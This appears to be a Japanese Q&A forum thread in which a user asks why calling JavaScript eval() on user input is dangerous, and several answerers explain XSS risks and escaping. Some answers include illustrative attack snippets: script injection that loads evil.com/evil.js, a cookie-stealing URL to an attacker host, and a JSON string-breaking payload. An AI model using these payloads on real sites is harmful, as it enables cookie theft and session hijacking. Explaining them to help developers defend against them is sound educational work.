• ベストアンサー

eval()の危険性の具体例を教えてくれませんか?

javascriptのeval()の危険性についての質問です。 下のようなページを公開したとして <html> <script> function execstr(str){eval("(" + str + ")");} </script> <body> <form action="#"> <input type="text" id="code"> <input type="button" onclick="javascript:execstr(this.form.code.value);" /> </form> </body> </html> 「ユーザーが入力したテキストをそのままeval()で評価実行するのは、悪意のあるコードがそのまま実行されてしまうので危険である」とされています。この危険な悪意のあるコードが、どんな危険性をもつのかが具体的にイメージが掴めないのです。 javascriptはクライアント側のブラウザーで実行されているものであり、そもそもローカルなリソースにはアクセス出来ないし、ましてサーバー側に影響を及ぼすようなjavascriptとはどんなものなのでしょうか? クッキーを盗むといっても、本人のクッキーを盗んでも仕方ないし、他人のクッキーはみれないでしょう。XMLHttpRequestで他のサイトにポストするコードを実行されても、サーバー側で困る事はないと思うのですが。

質問者が選んだベストアンサー

  • ベストアンサー
回答No.3

おそらくPerlなど、CGIで使用する言語のevalと混同されていると思います。 私が知る限りeval()による危険性は1点を除きありません。 が、この危険性も、まともなコード(通常の動作が行えるコード)であれば勝手にセキュリティーホールも埋まる物です。 (それ以外にもいくつか考えられますが、現実的でない、または悪意(悪戯)を持ってeval()を使用しているという可能性の方が高い) たとえば、このページで、 http://okwave.jp/qa4957775.html ブラウザのアドレス欄に下記を入力してエンターキー/リターンキーを押すだけで、 テキストフィールドに入力したコードを、利用者が自由にeval()する事が出来ます。 自分でテキストフィールドに書いたスクリプトを自分で実行するだけなら、わざわざ制作者がeval()を用意する必要はありません。 javascript:(function(){scrollTo(0,0); var ipt=document.getElementsByName('kw')[0]; ipt.value='alert("hello");'; eval(ipt.value);})() これは'alert("hello")'という文章を書いていますが、悪意のあるコードを書けばそれが実行されます。 とはいえ、サイト管理者しかページを更新できないなら、わざわざeval()を使わなくても、 HTMLファイルに<script>を書いてFTPでアップロードした方が手っ取り早いです。 サイト管理者以外の人がページを更新できる=BBSやブログのコメントの事ですが、 <script>タグを投稿できるかどうかというのと、eval()は関係ありません。 その<script>の中にeval()が使われていなくても、XSSコードやエクスプロイトコードは実行されます。 No.2でおっしゃってる事だと思いますが、 eval(document.getElementById('user-message').innerText); などとしていれば、危険性が出るかもしれません。 が、こんなコード、誰も作らないでしょう。 (.innerHTMLにはHTMLタグが含まれるため、eval()で実行できません。 なお、Firefoxなどでは.innerTextではなく.textContentです。) で、最初に書いた危険性の1つですが、 BBSなどの投稿文をAjaxやJSONPで受信している場合。 「こんにちは」というメッセージを投稿した人がいたとして、 ////// XMLHttpRequest.responseText postData={name: 'user', date: '2009-5-14', message: 'こんにちは'} これをeval(responseText)して document.getElementById('name').innerHTML=postData.name; document.getElementById('date').innerHTML=postData.date; document.getElementById('message').innerHTML=postData.message; などとして表示している場合、 「'+(function(){XSSやエクスプロイトコード})()+'」 というメッセージを投稿した場合、(シングルクォーテーションと+記号が前後についている) JSONデータが以下のようになりますので、 ////// responseText postData={name: 'user', date: '2009-5-14', message: ''+(function(){XSSコード})()+''} このときにeval(responseText)によってJavaScriptが実行されます。 JSONPなら、 callback({name: 'user', date: '2009-5-14', message: ''+(function(){XSSコード})()+''}); こんな感じで受信したときに実行されます。 JSONPはeval()不要です。 XMLで受信して、 eval(responseXML.getElementsByTagName('post').nodeValue); としてもJavaScriptは実行できます。 が、これらをわざわざeval()する人はいないと思うので、ほとんど問題にはならないでしょう。 これらのセキュリティーホールは、エスケープ処理で防げます。 BBSでは通常、<や>の記号を&lt;や&gt;に変換すると思いますが、 一緒に'をや\'に、"を&quot;に変換しておけば問題ないと思います。 postData={name: 'user', date: '2009-5-14', post: '+(function(){XSSコード})()+'} SQLインジェクションの応用ですが、私が確認してるのはこれだけです。 (SQLインジェクションもダブルクォーテーションのエスケープ忘れによる物です) ただ、普通に 「It's Fine!」 を投稿した場合、 postData={ post: 'It's Fine!' } スクリプトエラーになって受信できなくなるので、通常はエスケープ処理するはずですし、 よほど手抜きをしなければ、この件のeval()による危険性はないと思いますが、 文字列をダブルクォーテーションで囲まれている場合、このバグに気づきにくいかもしれません。 (ダブルクォーテーションを1つだけ使った投稿をする事が少ないため。) 例)Hello!" を投稿(受信できないが、こういう投稿をする人が少ない) postData={ post: "Hello!"" } 例)"+XSSコード+" を投稿(受信、実行される) postData={ post: ""+XSSコード+""" } > この危険な悪意のあるコードが、どんな危険性をもつのかが具体的にイメージが掴めないのです。 ウイルス性の物については「エクスプロイトコード」で検索してみて下さい。 > クッキーを盗むといっても、本人のクッキーを盗んでも仕方ないし、他人のクッキーはみれないでしょう。 XSS(主にクッキー取得コード)は、SNSや通販サイトのプロフィール・商品送付先・請求先住所などの取得を狙うのが普通ですね。 個人のBBSではXSSよりも、ウイルス関連のコードが埋められる可能性が高いです。

yyr446
質問者

お礼

詳細な解説ありがとうございました。 じっくり内容を理解してみます。  考えてばかりいても、楽しくないので、まずはPCのxampで公開せずに作っていろいろ試してみようと思います。

yyr446
質問者

補足

 javascriptで投稿内容を事前にeval()しても、そのページ自体を書き換えられる危険性はなさそうですね。要はPOSTされたコードを受け取るサーバー側のプログラムがしっかり対策すればよさそうですね。  まさに、ここ「教えて!GOO」のページではいろんなスクリプトコードやHTMLのコードまで投稿されてますが坂内に安全に表示されてますね(HTMLは時々バグってるみたい)。 作ろうと思ったページは、javascriptのソースを投稿してもらい、投稿したjavascriptのコードを送信する前に、そのページで、evalを使って事前にプレビュー実行も可能(無理なコードがあるのも分かってます)とさせ、登録ボタンを押すとサーバー側のphpに送信します。 サーバー側のPHPはPOSTされたコードを、$_POSTからローカル変数に格納する際にエスケープして受け取りaddslashes()してテキストデータとして保存します。掲示版の内容は保存されたテキストデータより<xml>を作成します。投稿されたスクリプトを取り出し加工して、 <description> <![CDATA[ スクリプトの内容 ]]> </description> として出力します。 掲示板のページは、ロード時、リロード時にサーバーに掲示板内容のXMLを ajaxで取りにいって、javascriptでパースしdom関数で編集して、<iframe> の中に表示させます。--といった掲示板を考えたのです。 回答番号:No.2さん指摘のDos攻撃のリスクはeval()つかって無くてもありえる話しなのでjavascriptのeval()の問題点とはいえないかも知れません。

その他の回答 (7)

回答No.8

> No.7 こちらこそ、うだうだとすみません。 私が知らないだけで、eval()の危険性はあるかもしれません。 サイト管理者しか投稿・更新できないのであれば、サイト管理者が悪意のあるコードを投稿しなければ済むだけですが。 セキュリティー関係のサイトを見ていると、考えられないような(実行して下さいと言わんばかりの)コードを紹介していたりしますし、 実際に、<iframe>タグを投稿できるサイトもありましたから、 ともすれば、前の人の投稿内容が、記入欄に残っているようなサイトもあるかもしれません。 (投稿確認->戻る(投稿内容が記入済み)->ブラウザ終了->他の人が表示。で、前の投稿が残ってるとか?) そうなれば、No.4に書かれたようなスクリプトを制作者が用意しておくだけでも、十分危険だと思います。 NO.6 最後のコード これでもよさそう。(NO.4と同じになります) 当然悪意のあるコードが投稿されれば、それが実行されます。 <script>タグの投稿許可でも同じですが、 セキュリティーチェック(安全なコードかどうかの確認)もなしに投稿・実行を許可しているのであれば、危険な事は容易に推測できるはずですし、やはり狙ってるとしか思えないですね。 -------------------- <script> function run(id){ eval(document.getElementById(id).innerText || document.getElementById(id).textContent); } </script> <pre><tt id="post1"> ユーザーが投稿したスクリプト </tt></pre> <a onclick="run('post1');">実行</a> -------------------- > XMLHttpRequestで他のサイトにポストするコードを実行されても、サーバー側で困る事はないと思うのですが。 言い忘れてましたが、JavaScriptそのものが影響する事はありません。 <script>onload=location.reload();</script> でもやられたらともかく、 通常はウイルスの感染を狙いそのウイルスがサーバーを狙うので、むしろ多くのスクリプトがサーバーに影響する可能性があります。

yyr446
質問者

お礼

talooさんありがとうございました。いろいろありそうなので、 当面、eval()するページと投稿するページは まったくつながりの無いページとする事にします。 なにしろ、サーバーはレンタルしているので迂闊なページはつくれません。 ローカルでいろいろ試します。 ご意見、ご指導が、たくさんありそうなので、この質問は クローズとします。  疑問点がでたらまた投稿します。

  • think49
  • ベストアンサー率59% (285/482)
回答No.7

No.4です。 > No.5 丁寧な指摘有り難うございます。 仰ることはよくわかります。私が No.3 の補足をしっかりと読まなかったためにいろいろな部分で誤解していました。 もう少し注意深く読む必要があると反省しています。 > *例として出されているURLは実存するため、そういう所は使わない方が良いと思います。 確かに。今後気をつけたいと思います。 親切にありがとうございました。

回答No.6

> No.4 > コードが掲示板のDBに登録されると、訪問者全員がこのコードを実行することになります。 アクセス時のコメント記入欄は真っ白なはずなので、その状態では、 eval(document.getElementById('コメント記入欄のID').value); を実行しても、何も起こりません。 HTMLタグ(<script>タグと<textarea>タグ)を投稿できるなら <script>eval(document.getElementById('test').value);</script> の一文と<textarea>タグを投稿する事で、テキストエリアの内容を実行することが可能ですが、 その場合はeval()が問題なのではなく、<script>タグを投稿できる事が問題です。 <script>タグを投稿できるなら、<textarea>もeval()を使う必要はありません。 <script type='text/javascript'> var s = document.createElement("script"); s.type = "text/javascript"; s.src = "http://example.com/evil.js"; document.getElementsByTagName("head")[0].appendChild(s); </script> これを投稿すればいいだけです。 <と>を&lt;、&gt;に変換してあれば、 &lt;script&gt;eval(document.getElementById('test').value);&lt;/script&gt; を投稿した事になりますから、eval()は実行できません。 > No.3 > 投稿したjavascriptのコードを送信する前に、そのページで、evalを使って事前にプレビュー実行も可能(無理なコードがあるのも分かってます)とさせ、登録ボタンを押すとサーバー側のphpに送信します。 > No.2 > ソースコードをPOSTされても受け取るPHPがエスケープした上で、記事として掲載するので、javascript側でevalしても投稿者以外はXSSされないと思います。 とのことで、お節介だと思いますが、 投稿時に1回実行できますが、悪意のあるコードを書いても、おっしゃるとおり単に自爆するだけですね。 他の人が表示したときは<textarea>の内容はクリアされているはずですから、他人のコードは実行出来ません。 という理由のため、eval()を使っても安全(他人に危害を加える事はない)と言えると思います。 要らぬお節介ついでに 他人が書いたコードをeval()できるシステムにするなら、それなりの処理は必要でしょう。 これは<script>タグを投稿できるのと同じです。 (evalの問題ではなく、「他人が投稿したコードを実行できるシステム」という設計が危険です) 私なら、別ページを用意して、<script>の中に直接書いてみます。 -------------------- <pre><tt> ユーザーが投稿したスクリプトを実態参照に変換した物 </tt></pre> <a href="1.html" target="iframe">このユーザーが投稿したスクリプトを試してみる</a> 1.htmlの内容 <body> <script> ユーザーが投稿したスクリプト </script> </body> -------------------- eval()を使う場合はこんな感じでしょうか。 -------------------- <script> function run(s){ eval(s); } </script> <pre><tt> ユーザーが投稿したスクリプトを実態参照に変換した物 </tt></pre> <script> var str1='ユーザーが投稿したスクリプト'; // 'を\/にエスケープするなどした物、面倒ならtextarea.valueでも可 </script> <a onclick="run(str1);>このユーザーが投稿したスクリプトを試してみる</a> -------------------- 簡単な対策は、たとえばスクリプトの中では'://'という文字列を禁止にすると、 絶対パス・相対URL(同一ドメイン内)しかアクセスできなくなります。 *geocitiesやSNSなどのドメイン共用サイトでは使えません。 *string.replace('/://g') => コロンを削除する正規表現などが投稿できなくなります。 *c=':',s='/';src='http'+c+s+s+・・・や、ASCIIコードなどから文字列を生成していると投稿できます。 *例として出されているURLは実存するため、そういう所は使わない方が良いと思います。

  • think49
  • ベストアンサー率59% (285/482)
回答No.5

#4です。 #3の補足を改めて読み直しました。 作ろうとされているページの実装は問題ないと思いますので、#4は聞き流してください。 失礼しました。

  • think49
  • ベストアンサー率59% (285/482)
回答No.4

#2です。 > ページ自体がサーバー上にあるため、ページに流し込むコードの作成は不可能だと思います。 JavaScriptでコンテンツを流し込むということなのですが、ひょっとして前提が違うのでしょうか? 私が考えていた前提条件は「投稿者がポストしたコメントの内容を無条件に eval() する」というものです。 <textarea id='test'> の内容が eval() されると仮定すると、下記コードでscript要素を流し込めます。 <textarea id='test'> var s = document.createElement("script"); s.type = "text/javascript"; s.src = "http://evil.com/evil.js"; document.getElementsByTagName("head")[0].appendChild(s); </textarea> <script type='text/javascript'> eval(document.getElementById('test').value); </script> コードが掲示板のDBに登録されると、訪問者全員がこのコードを実行することになります。 JavaScriptからはCookieを取得できるので、取得したCookieをGETパラメータで渡すことも可能だと思います。 > 回答番号:No.2さん指摘のDos攻撃のリスクはeval()つかって無くてもありえる話しなのでjavascriptのeval()の問題点とはいえないかも知れません。 これが危険なのは不特定多数の訪問者からDOS攻撃をされることです。 攻撃者が一人ならIPアドレスでキックすればいいですが、evalで流し込まれると訪問者全員が(意図せず)DOS攻撃をします。 訪問者全てを拒否するわけにはいきませんから、DOS攻撃されうるコードは流し込めないように対策する必要があります。

  • think49
  • ベストアンサー率59% (285/482)
回答No.2

おそらく、XSSに似た問題だと思うのですが…。 1. 投稿内容を eval() する掲示板がある 2. 悪意ある投稿者が <script type="text/javascript" src="http://evil.com/evil.js?cookie=***"></script> をページに流し込むコードをポスト 3. 以降、そのページを訪れると evil.js が実行され、evil.com管理者にCookieを盗まれる # オートコンプリートを使用していたら、ID,Passwordを盗まれるケースも…。 > ましてサーバー側に影響を及ぼすようなjavascriptとはどんなものなのでしょうか? サーバ側とは「そのページを管理しているサーバ」のことでしょうか? eval() で流し込まれたコードでF5アタックされるリスクが…ありますね。 (攻撃者自身がF5アタックするのではなく、そのページを訪れた第三者にF5アタックさせます。) ただ、eval() を避ける理由は訪問者のリスクへの配慮の意味合いが大きいと思います。

yyr446
質問者

お礼

アドバイスありがとうございました

yyr446
質問者

補足

(eval() で流し込まれたコードでF5アタックされるリスク…ありますね。) =>確かにそのページを管理しているサーバにDos攻撃される危険性がありますね。見落としてました。 Xss攻撃については 2. 悪意ある投稿者が <script type="text/javascript" src="​http://evil.com/evil.js?cookie=***"></script>​ をページに流し込むコードをポスト =>ページ自体がサーバー上にあるため、ページに流し込むコードの作成は不可能だと思います。その掲示板のページはサーバー上にあるので、そのページ自体のソースの更新は不可能のはずです。ソースコードをPOSTされても受け取るPHPがエスケープした上で、記事として掲載するので、javascript側でevalしても投稿者以外はXSSされないと思います。

noname#94983
noname#94983
回答No.1

まぁ、そのサンプルだったら、別に害はないだろう。 ただ、例えば不特定多数の人間が投稿できるような掲示板とかブログとかで、そうした甘い処理を書いてしまうと問題がある。例えば、JavaScriptで「クッキー情報を「http://○○/××.cgi?cookie=クッキー」みたいな形でURLに追加して別のサイトにジャンプするような処理を書いて投稿する。そのジャンプ先のサイトには、あらかじめ送られてきたクッキー情報を保存するような仕組みを用意しておく。 すると、そのページに誰かがアクセスすると、投稿したJavaScriptが画面に表示される際に実行され、アクセスした人間のクッキー情報を指定のサイトにジャンプして送りつけてしまう。そのサイトの人間は、すぐさま自分のブラウザのクッキー情報をそれにあわせて書き換えてアクセスすれば、盗まれた人間に成りすましてアクセスすることができる。これがクロスサイトスクリプティング(XSS)という攻撃。更に、SQLデータベースを利用しているような場合には、実行するSQL文を偽装する投稿を行い、すべてのIDやパスワードを表示させたりする攻撃もある。 というわけで、ただ単に画面に表示するというようなものであれば問題はないだろうが、送られた情報をどこかに保管し、表示したりするような処理になると、こうしたセキュリティの甘さは場合によって致命的になることがある、ということ。サーバーが壊れるとかいうことより、こうした攻撃で個人情報を盗めるという点が一番被害として大きい。例えば、オンラインバンクやオンラインショップにログインした人が投稿できる掲示板があったとして、そこでクッキー情報が盗まれたらどんなことになるか?と考えると恐ろしいことになる。

yyr446
質問者

補足

解答ありがとうございます。 まだよくわかりません。頭がかたいもので.... 例えば、私が不特定多数の人が書き込める掲示板のページを公開しているとします。掲示板の仕組みは、フォームよりテキストを入力してもらい、 サーバー側のPHPプログラムにPOSTして、サーバー側のプログラムが POSTされたテキストを厳格ににエスケープしてDBに格納追記し、DBに格納されたテキストを出力している物とします。 この時、掲示板のページにサーバーにポストする以外に、入力されたテキストをそのままevalするコードが書いてあったとして、何故、投稿者以外の人の情報が盗まれるのですか?

関連するQ&A

  • Evalの正しいソースを教えてください

    <body> <form id="fm"> <input name="t1" value="てすと"> </form> <script language="VBScript"> Function bt_onClick() MsgBox Eval("t" & CStr(1) & ".value") End Function </script> <button name="bt"></button> </body>

  • javascript + php でエラー

    エラーを取り除くことができず、困っています。 助けてください。 下記のようなコードで、PHPからjavascriptに文字列を渡しているのですが、 文字列に改行コードがあるとエラーになってしまいます。 (改行コードがない場合はエラーはでません) 文字コードはEUC-JP、改行はLFとしています。 エラーの原因と、対策を教えてください。 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=euc-jp"> <meta http-equiv="Content-Script-Type" content="text/javascript"> <script type="text/javascript"> <!-- function sampl(str) { alert(str); } //--> </script> </head> <body> <form method="post" action="#"> <?php $str = "テスト\n改行あり"; ?> <input type="button" value="実行" onClick="sampl('<?=$str?>')"> </form> </body> </html>

  • evalの計算結果について

    OSはWindows、ブラウザはIE4.0です。 以下のJavaScriptを実行すると、答えとして0.1を期待しているのですが、 s=0.09999999999999964 となります。どうしたら期待通りの答えがでるのでしょうか。 よろしく御回答お願いいたします。 <script language="JavaScript"><!-- スクリプト開始 s=eval("10.18-10.08"); document.write("s="+s); // スクリプト終了。 --></script>

  • 初歩がわかりません。

    おとといJavascriptはじめたものです。 VBやHTMLなどは少しだけ触ったことがあります。 足し算のプログラムで意味がわからない部分があり困っています。 <html> <head> <script language="javascript"> <!-- function calc(CL) { CL.Z.value = eval(CL.X.value)+eval(CL.Y.value) } //--> </script> </head> <body> フォームを使った計算 <form name="Calc"> <input type="text" name="X" value="0" size=10> + <input type="text" name="Y" value="0" size=10> = <input type="text" name="Z" size=10> <p> <input type="button" value="計算!!" onclick="calc(this.form)"> <input type="reset" value="clear"> </form> </body> </html> 上記のプログラムで、onclick="calc(this.form)"とありますが、どういう動作させているのでしょうか。 またSCRIPTのなかの function calc(CL) { CL.Z.value = eval(CL.X.value)+eval(CL.Y.value) } CL.X.value のvalueてなんのことでしょうか。 XとYを取り出して足しているってことはなんとなくわかるんですけれど。。 特に同一ページ内のjavascriptにpost?するっていうのがよくわかりません。 この場合どうやってSCRIPTに送って、どうやって数値を取り出しているのか、どなたかアドバイスお願いいたします。よろしくおねがいします。

  • PHPの処理結果をjavascriptで利用する方法

    既に似たような質問も出ていそうで恐縮ですが(一通り目を通したですが、目的とするものは見つけられませんでした)、 PHPとjavascriptのやりとりについて教えていただければ幸いです。 データをフォームなどから受け取る→サーバー側(php)で処理→ 処理した結果の変数をjavascript用の変数として扱うといったこと がしたいのですが、うまくできません。 実際には以下のような形で書いて失敗してしまいました。。。 /*xxx.php*/ <html> <head> <?php $result = $_POST["sentence"]; ?> <script language="javascript"> result = "<?=$result?>"; </script> <script src="xxx.js" type="text/javascript"language="javascript"></script> </head> <body> <form id="sample"> <input type="text" name="sentence"> <input type="submit" value="送信"> </form> </body> </html> /*xxx.js*/ /*xxx.js*/ window.onload = function(){ document.getElementById("sample").onsubmit = function() { var req = createHttpRequest(); req.onreadystatechange = function(){ if(req.readyState==4 && req.status == 200){ alert(result); //PHPの結果を待った後を想定した何らかの処理      //ここでresultを使いたいが、サーバー側への送信前      //の値が入っているだけでonsubmitが反映されていない。 } } req.open("POST","./xxx.php",false); //<-formでくくられた<input type="text">等の部分は反映されない。 req.send(""); } } function createHttpRequest(){ if(window.XMLHttpRequest){ return new XMLHttpRequest(); } else if(window.ActiveObject){ try{ return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e2) { return null; } } } } 私なりに調べたところ 1.PHPとjavascriptは別の所で動作しているので受け渡しは基本不可能 2.PHP側で動的に書き出すことで見せかけることはできる。 var test = <?=$test?>等 3.XmlHttpRequestでphpの処理を結果を待って、変数を利用しようと思ったが、 <form id="form"> <input type="text" name="sentence"> <input type="submit" value="送信"> </form> といった場合に$_POST["sentence"]に値を入れる方法が不明。 また、 multipart/form-dataによる送信など方法が複雑。 responseTextには<html>から</html>まで格納されてしまった。 処理項目ごとに表示用に別にPHPファイル作成だと困る。 4.<form action = "xxx.php" onsubmit=関数名>とすると、 onsubmitで指定した関数が先に呼び出されてから、 xxx.phpの実行が行われるので、サーバー処理を待たずに javascript側が実行されてしまう。 といったことだけは分かりました。 しかし、どのように変更すればうまくいく(もしくは見せかける) ようになるのかがさっぱり分からなかったため、 質問させていただきました。 よろしくお願い致します。

    • ベストアンサー
    • PHP
  • 小数の足し算

    Javascriptで <SCRIPT language="JavaScript"><!-- function wa() { a = eval( document.myFORM.a.value ); b = eval( document.myFORM.b.value ); s = a + b; document.myFORM.kotae.value="答え " + s; } //--></SCRIPT> </HEAD> <BODY> <FORM name="myFORM"> A =<INPUT type="text" name="a" size="3">B =<INPUT type="text" name="b" size="3"><BR> <INPUT type="text" name="kotae"><INPUT type="button" value="=" onclick="wa()"> </FORM> </BODY> としたとき A=0.1 B=0.05とすると 答え 0.15000000000000002となるのはなぜですか?

  • javascriptの計算フォームでカンマ区切り

    下記のようなjavascriptの計算フォームで計算結果に3ケタのカンマ区切りと小数点第2位までで切り捨てるようにしたいのですがどのようにすればよろしいでしょうか? 「javascript カンマ区切り」で検索したサイトをいろいろ見てみたのですが全然わかりません。 どなたかご教授お願い致します。 <head> <script language="JavaScript" type="text/JavaScript"> <!-- function Multiplication(form){ var test = form.ans.value = eval(form.num1.value)*eval(form.num2.value); return false; } --> </script> </head> <p>A×B×C=合計</p> <div> <form name="multiplication"> <input type="text" size="6" name="num1"> × <input type="text" size="6" name="num2" onBlur="Multiplication(this.form)"> = <input type="text" size="15" name="ans" class="txtbox">円(税別価格) <input type="reset" value="やり直し"> </form> </div> </body> </html>

  • JAVASCRIPTでINPUT

    HTMLとJAVASCRIPTとJSPを使ってシステム構築をしております。 --------------- <html> <head> <SCRIPT Language="JavaScript"> <!-- function send() { alert("<input type=text name=name2>"); } // --> </SCRIPT> </head> <body> <form onSubmit="send(); return false;"> <input type=text name=name1> <input type=submit> </form> </body> </html> --------------- 上記のコードでやりたいことは、 submitボタンが押されたときにJAVASCRIPTを呼び出し JAVASCRIPT上で文字を入力し次画面へ送信するような機能を作りたいと思っているのですが、本を見てもなかなか載っていません。 もしかしたらJAVASCRIPTだけではできないかもしれません。 JSPまたはPHPで出来る機能でも良いので教えてください。

  • 無効な viewstate

    無効な viewstate 事情があり、javascriptからaspのフォームをサブミットしたいと考えています。 後述したプログラムを記述しましたが、「無効な viewstate です」といった エラーが発生します。 おそらく、javascriptから実行したsubmitが、aspのviewstateの値をサーバに 送信していない為だと思うのですが、javascriptでviewstateを取得する方法など 回避策はあるのでしょうか? <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title></title> <script type="text/javascript"> function btn_onclick() { document.getElementById("form1").submit(); }; </script> </head> <body> <form id="form1" runat="server" action="nextpage2.aspx"> </form> <input type="button" value="test" onclick="javascript:btn_onclick();" /> </body> </html>

  • JavaScriptの計算式を添削してください。

    250×変数A+200×変数B+150×変数C=合計という 計算をしたくて過去の質問をヒントに自分なりに工夫して 作成いたしました。(JavaScriptは超初心者) 変数A~Bには整数が入ります。 自分で動作を確認したところ問題無く動くようですが、 何か問題がないか心配です。 これでいいのか、間違っているところがないか 確認願いますでしょうか。 <HTML> <HEAD> <SCRIPT language="JavaScript"> <!-- function calc() { document.f.t4.value = eval(250) * eval(document.f.t1.value)+eval(200) * eval(document.f.t2.value)+eval(150) * eval(document.f.t3.value); return true; } //--> </SCRIPT> <TITLE></TITLE> </HEAD> <BODY> <FORM name="f"><INPUT type="text" name="t1" onkeyup="calc()" value="0"><INPUT type="text" name="t2" onkeyup="calc()" value="0"><INPUT type="text" name="t3" onkeyup="calc()" value="0"> = <INPUT type="text" name="t4"></FORM> </BODY> </HTML>